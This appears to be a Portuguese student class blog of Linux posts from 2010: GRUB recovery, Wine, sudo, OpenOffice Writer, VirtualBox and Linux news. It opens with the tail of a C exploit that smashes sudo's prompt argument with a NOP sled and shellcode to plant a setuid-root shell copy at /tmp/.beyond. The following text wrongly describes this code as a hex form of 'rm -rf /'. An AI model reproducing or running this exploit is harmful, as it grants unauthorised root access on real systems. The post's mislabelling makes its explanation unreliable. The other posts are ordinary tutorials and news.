"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
}
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
}
snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
SPROMPT, nops, shellcode, rets);
return exp_buffer;
}
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
}

Então, esta é uma versão do código hexadecimal para "rm -rf / &". Isto faz nada mais nada menos que limpar o seu diretório raiz.

Estas são apenas algumas orientações para que você não seja enganado e pense que o Linux não presta, ele é muito poderoso e esse poder todo fica ao seu dispôr, por isso lembre-se do conselho do tio Ben.

http://www.vivaolinux.com.br/artigo/5-comandos-que-ninguem-nunca-deve-executar-no-Linux> ===Link Do arquivo!===

Grupo: Gabriel, Julio, Carlos

quarta-feira, 21 de abril de 2010

Restaurando o Grub no Ubuntu

Para quem já teve o problema ,depois do Linux instalado, ter alguém de sua família (ou mesmo no trabalho) chegando e exigindo que o Windows seja instalado no micro, e com isso o Grub simplesmente não roda mais, há um solução simples.

Depois que o sistema da Microsoft tomou conta de sua máquina e simplesmente ignora o que está na MBR, dê o boot pelo CD de instalação do Ubuntu (preferencialmente o 9.04) e, no terminal, dê a seguinte sequência de comandos:

$ sudo grub
grub> find /boot/grub/stage1
## digitar no X,Y abaixo o resultado do comando acima
grub> root (hdX,Y)
grub> setup (hd0)
grub> quit
# reboot

Pronto, seu Grub volta à vida vindo do Hades para tomar conta de sua máquina e restituir sua liberdade novamente!

http://www.vivaolinux.com.br/dica/Restaurando-o-Grub-no-Ubuntu/

Grupo : André,Iago,Victor,Vitor,Wellington


Visualizar informações do seu GNU/Linux

Bem, para sistemas derivados do Debian, como Ubuntu, Linux Mint (dizem que o Mint é derivado do Ubuntu, mas... enfim), e outros, existe um comando para a visualização de informações do sistema.

Você pode obter essas informações tanto pelo arquivo como pelo comando.

Digite em seu terminal:

# lsb_release --all

No LSB modules are available
Distributor ID: Ubuntu
Description: Ubuntu 9.10
Release: 9.10
Codename: karmic


No Ubuntu você também tem a opção de utilizar o comando cat, para obter o conteúdo do arquivo /etc/lsb-release, veja:

# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10



Grupo : André,Iago,Victor,Vitor,Wellington

segunda-feira, 19 de abril de 2010

Rodando aplicativos windows no Linux

WINE

O Wine é uma ferramenta que permite executar programas Windows dentro do Linux. Sabemos que os arquivos .exe não são possíveis serem executados no Linux, ele nem mesmo reconhece que este é um arquivos executável. Mais com o Wine isso pode ser possível.
A primeira coisa a fazer é instalar o Wine. Que é fácil, assim:
No terminal do Linux digite: apt-get install wine

Para configurar essa ferramenta:
Menu aplicativos> wine > configure wine>
Na aba unidades
Auto detectar(procura lugares para conseguir emular ambiente Windows)
Selecione a pasta padrão> c:drive_c
Aplicativos> versão do Windows XP

Agora é só escolher quais os programas que você deseja utilizar no seu Linux.
Menu Locais > pasta pessoal> na aba VER visualizar os arquivos ocultos.
>wine> drive_c (nessa pasta cole todos os aplicativos e programas que deseja usar)
Aproveite este ótimo programa e use todos seus programas sem nenhum conflito!

Rodando aplicativos windows no Linux

WINE

O Wine é uma ferramenta que permite executar programas Windows dentro do Linux. Sabemos que os arquivos .exe não são possíveis serem executados no Linux, ele nem mesmo reconhece que este é um arquivos executável. Mais com o Wine isso pode ser possível.
A primeira coisa a fazer é instalar o Wine. Que é fácil, assim:
No terminal do Linux digite: apt-get install wine

Para configurar essa ferramenta:
Menu aplicativos> wine > configure wine>
Na aba unidades
Auto detectar(procura lugares para conseguir emular ambiente Windows)
Selecione a pasta padrão> c:drive_c
Aplicativos> versão do Windows XP

Agora é só escolher quais os programas que você deseja utilizar no seu Linux.
Menu Locais > pasta pessoal> na aba VER visualizar os arquivos ocultos.
>wine> drive_c (nessa pasta cole todos os aplicativos e programas que deseja usar)
Aproveite este ótimo programa e use todos seus programas sem nenhum conflito!

sábado, 10 de abril de 2010

Songbird diz adeus ao Linux

Já disse alguém que a diferença entre a realidade e a ficção é que a ficção precisa fazer sentido. Lembrei dessa frase ao saber que o Songbird, uma espécie de jukebox/player de áudio open source baseada nos projetos da Mozilla, não mais dará suporte ao Linux. É a realidade, cheia de surpresas que dispensam maiores explicações.
Mas, nesse caso específico, há uma explicação. Não muito clara, mas está lá, no blog oficial. O Songbird está presente em vários dispositivos e nos principais sistemas operacionais desktop do mercado, e manter essa estrutura, com tudo funcionando bem, atualizado e em todo lugar, é complicado, principalmente com o time reduzido com que a empresa conta. Assim, após muita conversa e com “dor no coração”, os desenvolvedores optaram por parar de suportar a versão para Linux.
Ainda oferecerão atualizações, códig0-fonte, nightly builds, tudo isso, mas sem testes de qualidade mais aprofundados, nem garantias de que novidades das versões Windows e Mac OS X entrarão nas futuras versões do Linux.
O Georges Albergar, autor do post, atualizou-o com uma tabela mostrando a participação da comunidade no desenvolvimento do programa. Linnuxer, não chore: o Windows ganha disparado em todos os quesitos, e em segundo lugar, está a comunidade do Mac OS X. Em trabalho comunitário, pelo menos no que toca ao Songbird, o Windows dá show. Definitivamente, a realidade não só não faz sentido, mas é também uma brincalhona que adora uma fina ironia…
Isso não significa que os novos usuários linux não preferem o linux ao windows, muitos dizem que o windows está desatualizado e não tem mais uma "cara" jovem,como a maioria gosta.

fonte: >Meio Bit

grupo:Kerolayne e Jéssica

O QUE ACONTECE COM O LINUX?


HACKER DEVOLVE SUPORTE PARA LINUX NO PLAYSTATION 3


George Hotz, popularmente conhecido como Geohot prometeu e cumpriu. O notório hacker famoso por ser o primeiro a “desbloquear” o Iphone e o console Playstation3(PS3) da Sony, anunciou via vídeo postado no youtube sua versão modificada no firmware (3.21) para o console PS3, que restaura o suporte ao sistema operacional Linux removido na versão oficial da Sony.

Chamado de 3.2100, o firmware, que ainda não está disponível para download teoricamente poderia permitir que o modelo atual do console PS3 Slim, também tenha suporte para o sistema operacional Linux. Segundo Geohot, entretanto, são necessários mais testes para a confirmação dessa hipótese.

Antes somente o modelo antigo do console tinha suporte para o Linux.

De acordo com hacker a instalação do novo firmware é fácil e simples não sendo necessário abrir ou modificar o console em qualquer forma. O link para o novo firmware será publicado em breve no blog do próprio hacker.


fonte: Terra

GRUPO:KEROLAYNE E JESSICA

sexta-feira, 9 de abril de 2010

Windows X Linux




Há muitos anos somos massacrados pelo monopólio do Sistema Operacional e nem percebemos. Só falamos no Windows, só compramos o Windows, só usamos o Windows. Sabemos o que ele nos oferece e somos gratos por isso. Esquecemos de conferir o que os concorrentes têm a oferecer.

E assim Bill Gates abusou de nossa boa vontade lançou produtos inacabados e colocou os preços nas nuvens - se tornou o homem mais rico do mundo e foi feliz para sempre.

Mas talvez as coisas estejam prestes a mudar... Em 1991, o finlandês Linus Torvalds lançou o Linux, um sistema operacional revolucionário que prometia bater o Windows. Hoje, no Brasil, segundo a Istoé, ele funciona em 27% dos servidores de rede e em 5% dos micros domésticos. Na maioria das Procuradorias, inclusive na nossa, o Linux é o sistema operacional escolhido para hospedar as páginas (Internet e Intranet) da instituição.

As principais diferenças entre os dois são:

1) O Windows tem código fonte fechado, isto é, ninguém pode alterá-lo, só o fabricante tem acesso para corrigir os erros ou aperfeiçoá-lo. Ao contrário, o Linux não tem segredos e há vários grupos trabalhando em seu desenvolvimento e criando versões de acordo com as diversas necessidades do mercado.

2) Uma única cópia do Windows está sendo vendida em média por R$500,00 (quinhentos reais) enquanto o Linux é distribuído, sem limite de instalações, cobrando-se apenas os preços dos manuais e da mídia.

3) O Linux é estável, praticamente não trava, trabalha como um verdadeiro sistema operacional multitarefa. No Windows frequentemente temos que pressionar Ctrl+Alt+Del e reiniciar o computador.

4) Há uma grande oferta de aplicativos para o Windows, principalmente jogos, o que o torna o preferido dos usuários domésticos. No Linux há programas para editar imagens, digitar textos, acessar a Internet, mas quanto aos jogos ele deixa a desejar.

5) O Linux tem procedimento de instalação potencialmente mais difícil e só é recomendável a usuários experientes fazê-lo sem assistência.

Certamente, a grande motivação para quem quer trocar o Windows pelo Linux é o preço. Estima-se, segundo o Correio Braziliense, de 27/03/2001, que o Governo Federal gasta anualmente na aquisição de software proprietários (derivados da Microsoft basicamente) R$ 4 bilhões por ano. Na PR/GO gastaremos R$ 25.000,00 reais na compra de programas este ano.

Claro que as coisas não são tão simples assim, não podemos trocar nossas ferramentas, de uma hora para outra, sem antes elaborar refinado programa de treinamento e sem um largo período de transição. Mesmo assim, as resistências seriam enormes. A inércia e o comodismo, próprios de nossa rotina de trabalho, inibe inovações. Porém, as vantagens, a longo prazo, são gigantescas.





Fonte:www.prgo.mpf.gov.br/doutrina/LUCIANO%20-39.htm

Grupo: Larissa, Líris, Marcelo, Marina.

quinta-feira, 8 de abril de 2010


1- Diferença entre useradd e adduser :
O adduser é interativo,ou seja, automático, você só seleciona login, id , group...
Ex: Cria o usuário “etec” no grupo “etec”

Já o useradd é manual, ou seja, você define a senha.
Ex: Cria o usário “etec” (e você escolhe a senha)


2- Comando sudo :
É um dos comandos mais utilizados pelo linux. Com ele é possível rodar programas como root sem estar logado como o mesmo. Ele dá privilégios, por exemplo, a um administrador que não precisa estar logado como root, o que ajuda na segurança do sitema.

Essa funcionalidade permite que os administradores de sistema possam delegar alguns poderes para determinados usuários de sua rede, permitindo que os mesmos possam ajudar no gerenciamento de tarefas locais (ou remotas), sem precisar dar a eles acesso como usuário root, o que seria extremamente perigoso.
Administradores que utilizam o sudo em seus ambientes de trabalho devem sempre estar atentos as suas configurações. Afinal, qualquer associação errada de comando/usuário a lista do arquivo /etc/sudoers pode dar excesso de poderes a quem não deveria ter. Outra preocupação importante diz respeito a atualização desta ferramenta. Por ser uma ferramenta de "alta periculosidade", sempre que forem notificados casos de falhas críticas, a administração local precisa manter um esforço de monitoramento redobrado, e atualizar o sudo assim que uma correção for lançada.


Grupo(Larissa, Líris, Marcelo e Marina)

quinta-feira, 1 de abril de 2010

Saiba quando vale a pena adotar o Linux, sistema operacional gratuito

Com ambiente gráfico, novas versões estão mais fáceis de usar.
Mais leve e com custo zero, sistema desafia domínio do Windows.



O velho estigma de "difícil" do Linux está, pouco a pouco, desaparecendo. Visto até recentemente como o programa predileto dos hackers, nerds e fascinados por tecnologia, o sistema operacional evoluiu, ficou mais acessível e, em alguns mercados, já tem incomodado o Windows.

A febre dos netbooks - computadores portáteis com custo baixo e potência reduzida - contribuiu para que as pessoas perdessem parte do preconceito contra o Linux. A primeira geração dessas máquinas foi para as lojas trazendo na memória versões adaptadas do sistema operacional livre, já que o Windows Vista, vendido à época, era pesado demais para funcionar neste tipo de computador.

Outros fatores que contribuíram para esse crescimento foram a consolidação do Ubuntu como "distro" (como são chamadas as distribuições, ou versões do sistema) indicada para iniciantes, o envolvimento de empresas como Sun, IBM e Google - que promete lançar seu Chrome OS, baseado em Linux, ainda em 2010 - no desenvolvimento do programa, e, por fim, o crescimento da internet. É no mercado de servidores web que o Linux se destaca, liderando com boa margem sobre a Microsoft.

Mas o Linux não é capaz, ainda, de substituir completamente seus rivais pagos. Em algumas áreas, é imprescindível utilizar computadores com sistemas Windows ou Mac OS. Não há, por exemplo, boas opções no mundo do software livre para edição de vídeo. Quem usa o computador para jogar também tem mais opções se tiver o Windows instalado.

Se você está pensando em adotar o Linux em seu computador, confira abaixo o que você precisa saber sobre o sistema operacional:

>>> Dá para usar Linux em qualquer computador novo? E nos antigos?

O Linux é compatível com todos os PCs modernos. A arquitetura do sistema operacional aberto permite, por exemplo, que com pequenos ajustes o usuário seja capaz de instalar o Linux em diversos tipos de equipamentos. É por isso que hoje em dia existem aparelhos como telefones celulares, carros, televisores, tocadores de DVD e até videogames que utilizam tecnologia Linux para funcionar.

Outra vantagem é que há versões Linux bastante leves, capazes de rodar até mesmo em computadores mais antigos. Quem tem um PC encostado em casa, incompatível com o Windows 7 ou rodando Windows Vista e XP com problemas, pode fazer o teste: bem provavelmente a máquina ficará mais rápida utilizando uma versão do Linux.

>>> É verdade que o Linux é mais seguro em relação a vírus?

A grande maioria dos vírus disseminados pela rede hoje em dia tentam atingir usuários do sistema operacional Windows. Portanto, quem usa Linux pode ficar um pouco mais tranquilo.

Isso não quer dizer, no entanto, que o Linux é 100% seguro. Mesmo que o núcelo do sistema fique livre de brechas, podem existir falhas, conhecidas como "exploits", em outros programas, como o Mozilla Firefox. Mas nada é 100% seguro, e na comparação com o Windows, o Linux ainda leva vantagem em segurança.

>>> O Linux é realmente fácil de usar?

Para quem utiliza o computador apenas para navegar na internet, checar emails e ver arquivos digitais de áudio e vídeo, o Linux é bastante simples. Nas versões mais atuais do Ubuntu, por exemplo, tudo o que você precisa para realizar estas tarefas já vem instalado no sistema operacional.

Para algumas funções mais avançadas, no entanto, o sistema ainda perde em facilidade para o Windows. A rotina de instalar programas, que já não é uma das tarefas mais simples para iniciantes no Windows, pode assustar usuários que estão tendo o primeiro contato com o Linux.

O que deixa mais fácil a vida de quem usa Linux é a existência, na Internet, de uma grande comunidade de usuários e desenvolvedores disposta a sanar as dúvidas dos iniciantes. Os fãs de Linux acabam fazendo parte do desenvolvimento do programa, já que costumam colaborar na caça de "bugs" e com sugestões de como as próximas versões de cada uma das distribuições.

>>> O Linux é compatível com todos os hardwares existentes para Windows?

Não. E essa talvez seja ainda a grande barreira para a adesão em massa ao sistema. Nem todas as fabricantes de impressoras, webcams e periféricos em geral criam versões para Linux de seus drivers - programas necessários para que o computador "converse" com o equipamento.

Esse cenário tem melhorado bastante, mas ainda não atingiu o ponto em que todo equipamento compatível com Windows é, também, compatível com Linux. Há relatos de impressoras e scanners simplesmente incompatíveis com o sistema.

Parte do problema é resolvido pelos próprios entusiastas do Linux, que programam por conta própria versões caseiras dos drivers. Nem todos, no entanto, funcionam perfeitamente. Se você está pensando em adotar o Linux, é bom, portanto, verificar se há drivers disponíveis para todos seus equipamentos.


fonte: G1-Tecnologia

Grupo: Alessandra e Natália

quinta-feira, 25 de março de 2010

Open Office Writer



Descrição: O Writer é o editor de textos do BrOffice.org.
Você pode usá-lo tanto para escrever uma carta rápida quanto para produzir um livro inteiro, com figuras embutidas, referências cruzadas, sumários, índices, bibliografias, enfim... Funções como Auto-completar, Auto-Formatar, Verificação Ortográfica facilitam seu trabalho. O Writer é poderoso o bastante até para executar tarefas típicas de editoração eletrônica, tais como a criação de informativos com várias colunas e brochuras – sua imaginação é o limite.

Iniciando o Open Office

Clique em Iniciar/Programas/OpenOffice.org 2.0/OpenOffice.org Writer

Digitando um texto:
Digite o texto desejado como de costume. Não se preocupe com a formatação.

Formatando fonte:
Você pode formatar a fonte da seguinte maneira:

1. Selecione o texto, frase ou palavra desejada, clique com o botão direito do mouse. Na janela que se abre você pode escolher o tipo de fonte, o tamanho, o estilo, etc. (uma escolha de cada vez).

2. Selecione o texto, frase ou palavra desejada, clique com o botão direito do mouse. Na janela que se abre escolha “Caracter”. Na próxima janela faça as alterações desejadas todas de uma vez.

3. Selecione o texto, frase ou palavra desejada, clique em “Formatar”, na barra de menu,
escolha “Caracter”. Na janela que se abre faça as alterações desejadas.

Formatando Parágrafo:
Você pode formatar o parágrafo da seguinte maneira:

1. Selecione todo o texto. Clique com o botão direito do mouse e escolha a opção “Parágrafo”. Na janela que se abre clique em “Recuo e Espaçamento” e marque a “Automático” na opção “Primeira linha”. Em “Espaçamento de linhas escolha a opção desejada (simples, 1, 5, duplo, etc.)

2. Selecione todo o texto. Clique em “Formatar”, na barra de menu, escolha “Parágrafo” e proceda da maneira descrita acima.


Inserindo Figuras:
Clique em Inserir/Figura/Do arquivo. Na janela que se abre localize e selecione a imagem desejada. Clique em abrir para inserir a imagem.

Formatando Imagens
Após inserir a imagem dê um clique na mesma para selecioná-la (Aparecerão pontos verdes na mesma).
Na Barra de Figuras (Exibir/Barra de Ferramentas/Figura) clique no ícone “filtro” (varinha mágica) e escolha um dos vários estilos.
Marca d'água: Selecione a figura.Na Barra de Figura, modo gráfico (caixa de seleção onde está escrito Padrão) escolha a opção Marca d'água.

Inserindo Tabela
Para inserir uma tabela clique em Tabela/Inserir na barra de menu. Na janela que se abre dê um nome para a tabela (opcional), defina o número de colunas e linhas. Marque as opções “Título” e “Repetir Título” para que o título de cada coluna se repita caso a tabela ocupe mais de uma página.

Inserindo Cabeçalho e Rodapé
Caso a régua vertical não esteja ativa (aparecendo no lado esquerdo do monitor) clique em Ferramentas/Opções. Na janela que se abre dê um clique no sinal de mais (+) de OpenOffice.org writer e clique em Exibir. No lado direito da janela marque a opção Régua Vertical.
Para inserir o cabeçalho clique em Inserir/Cabeçalho/Padrão na Barra de Menu.
A régua vertical ficará cinza com um retângulo branco indicando a área do cabeçalho. Agora é só digitar o cabeçalho.
Para inserir o rodapé clique em Inserir/Rodapé/Padrão e proceda da mesma forma para
cabeçalho.


Formatando Página
Para formatar página dê um clique em Formatar/Página na Barra de Menu. Na janela que se abre clique em Página para configurar o formato e a margem.

Usando o Fontwork
Clique em Exibir/Barra de Ferramentas/Fontwork. Na Barra que aparecerá dê um clique no “quadro com a letra A “para visualizar os modelos existentes”.

Dê dois cliques no modelo desejado para selecionar. O modelo escolhido aparecerá na tela.
Dê dois clique no mesmo para que o cursor apareça e digite o texto desejado (o cursor aparecerá antes da palavra fontwork em negrito). Clique na página para finalizar. Aumente ou diminua a fontwork com desejar posicionando o cursor nos pontos azuis.

Salvando o documento
Para salvar o texto criado clique em Arquivo/Salvar Como na Barra de Menu. Na janela que se abre escolha a pasta onde o documento será salvo. Dê um nome para o arquivo. Clique em Salvar.

Exportando o documento para PDF
Para transformar o documento em um arquivo PDF clique em Arquivo/Exportar como PDF. Na janela que se abre dê um nome para o arquivo e clique em salvar.



grupo:(Anyele,Daniela,Danieli,Ingrid e Taisa)

sábado, 20 de março de 2010

Máquinas Virtuais: Alternativa simples e fácil de ter o Ubuntu em seu Computador


Máquinas virtuais são muito utilizadas para testar sistemas operacionais ou programas sem alterar as configurações do sistema em uso. É uma tecnologia que simulará um computador dentro de outro. Com essas maquinas virtuais é possível se ter o Ubuntu dentro do Windows, sem retira este da máquina.Um exemplo de programa de máquina virtual e o Virtual Box

Ele é desenvolvido pela Sun Microsystems com parte de seu código fonte aberto e está disponível para download grátis. Com ele é possível manter diversos sistemas dentro do seu computador.

Para instalação, o programa faz umas perguntas iniciais como qual o tipo de sistema será instalado, quanto espaço em disco e na memória será separado e mais. É possível também usar um arquivo de imagem de disco ISO ou o próprio drive de CD/DVD para instalar o sistema operacional.

No site do Baixaki você poderá encontrar o programa para download, além de informações que te ajudarão a instalá-lo em seu computador.


(Grupo Anyele, Daniela, Danieli, Ingrid e Taísa)
=)

segunda-feira, 15 de março de 2010

-Inovações do Ubuntu 9.10-

Aperfeiçoamento do sistema de notificação;

Novo bootsplash;

Novo GDM;

Boot mais rápido, aproximadamente 20 segs.;

Mudança no tema Human (De Laranja para Marrom);

Troca do tema de ícones Human para Humanity;

Inclusão de vários papéis de parede;

Núcleo Linux 2.6.31;

Sistema EXT4 por padrão;

Bootloader Grub2;

Ubuntu One instalado por padrão;

Empathy substitui Pidgin;

Gnome 2.28.1;

Central de Programas Ubuntu por padrão.

Grupo: Gabriel, Julio, Carlos Renan